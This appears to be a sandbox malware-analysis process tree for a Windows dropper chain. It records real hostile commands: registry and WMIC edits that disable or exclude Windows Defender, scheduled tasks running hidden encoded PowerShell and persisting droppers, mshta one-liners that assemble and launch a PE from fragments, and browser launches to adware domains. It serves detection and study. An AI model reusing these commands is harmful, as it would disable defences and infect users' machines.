\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAbGYAnjK" /SC once /ST 08:47:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 14:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\ILcUsxq.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\rqSglvJaLP5XGFHBpG4Rc_Oz.exe"C:\Users\Admin\Documents\rqSglvJaLP5XGFHBpG4Rc_Oz.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\tDiIcBXheuYtb4LwtfH_Fk1Z.exe"C:\Users\Admin\Documents\tDiIcBXheuYtb4LwtfH_Fk1Z.exe"6⤵
-
C:\Users\Admin\Documents\BZ3hUqFBvCaOPr2WoOoHz8Qo.exe"C:\Users\Admin\Documents\BZ3hUqFBvCaOPr2WoOoHz8Qo.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\Installer.exe"C:\Program Files (x86)\Company\NewProduct\Installer.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe8⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Users\Admin\Documents\Vg807KHIlrePhVsM_k1biafy.exe"C:\Users\Admin\Documents\Vg807KHIlrePhVsM_k1biafy.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 2647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\tYebFztzNZipmvbK7t_wj8Yf.exe"C:\Users\Admin\Documents\tYebFztzNZipmvbK7t_wj8Yf.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\AArNg9PA04WFChdxcAiYLZOu.exe"C:\Users\Admin\Documents\AArNg9PA04WFChdxcAiYLZOu.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\KH_hTf7gZq3Wmprg77dfBrV9.exe"C:\Users\Admin\Documents\KH_hTf7gZq3Wmprg77dfBrV9.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 17327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\Jzv7xqj_zFOvQQci4U_z8X7S.exe"C:\Users\Admin\Documents\Jzv7xqj_zFOvQQci4U_z8X7S.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\B3RxkzspLWh_9RBfJF39ZXl3.exe"C:\Users\Admin\Documents\B3RxkzspLWh_9RBfJF39ZXl3.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1208 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\bcbmc4SWL8tZPvkxM154mpJP.exe"C:\Users\Admin\Documents\bcbmc4SWL8tZPvkxM154mpJP.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\pxAwc_nouvEsJQUkaBMdruMv.exe"C:\Users\Admin\Documents\pxAwc_nouvEsJQUkaBMdruMv.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\JV6hGwXs3Mf1g2rSJrCdh6Bp.exe"C:\Users\Admin\Documents\JV6hGwXs3Mf1g2rSJrCdh6Bp.exe"8⤵
-
C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\RUpLHkrv85jo7E7OwfaBdEAd.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "RUpLHkrv85jo7E7OwfaBdEAd.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"C:\Users\Admin\Documents\yWwu4lJ0uJadAHnVzpydnDkG.exe"9⤵
-
C:\Users\Admin\Documents\OUwWzxudrdRKwfe4TAMw2v9N.exe"C:\Users\Admin\Documents\OUwWzxudrdRKwfe4TAMw2v9N.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 17289⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\6FWMzlXnCtqJ3wOoKIv1m2Cg.exe"C:\Users\Admin\Documents\6FWMzlXnCtqJ3wOoKIv1m2Cg.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 2849⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\6X0_BEDTzWiPAaJRWeA5gmnS.exe"C:\Users\Admin\Documents\6X0_BEDTzWiPAaJRWeA5gmnS.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp9413_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp9413_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp9413_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp9413_tmp.exe10⤵
-
C:\Users\Admin\Documents\ECpQxvrk7QdfeLYkQ6sFcXH5.exe"C:\Users\Admin\Documents\ECpQxvrk7QdfeLYkQ6sFcXH5.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6804 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\7JgZQWnBCdcBN6dMlS_l4DGk.exe"C:\Users\Admin\Documents\7JgZQWnBCdcBN6dMlS_l4DGk.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS86B5.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS9C02.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
- Loads dropped DLL
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIpMTiMiI" /SC once /ST 01:22:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 14:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\CsPyyfG.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\5AYhJBzk5DK53YJC_wBu_I8r.exe"C:\Users\Admin\Documents\5AYhJBzk5DK53YJC_wBu_I8r.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\r9A3m_8Kh57rxeYKJ11wn3wk.exe"C:\Users\Admin\Documents\r9A3m_8Kh57rxeYKJ11wn3wk.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GK10T.tmp\r9A3m_8Kh57rxeYKJ11wn3wk.tmp"C:\Users\Admin\AppData\Local\Temp\is-GK10T.tmp\r9A3m_8Kh57rxeYKJ11wn3wk.tmp" /SL5="$503F2,506127,422400,C:\Users\Admin\Documents\r9A3m_8Kh57rxeYKJ11wn3wk.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-1Q4TA.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-1Q4TA.tmp\Sharefolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Photo Viewer\NNWURWEDEY\foldershare.exe"C:\Program Files\Windows Photo Viewer\NNWURWEDEY\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\67-201e8-401-4038d-06d64dbfbb448\Xanobezhyju.exe"C:\Users\Admin\AppData\Local\Temp\67-201e8-401-4038d-06d64dbfbb448\Xanobezhyju.exe"11⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac2046f8,0x7ffcac204708,0x7ffcac20471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
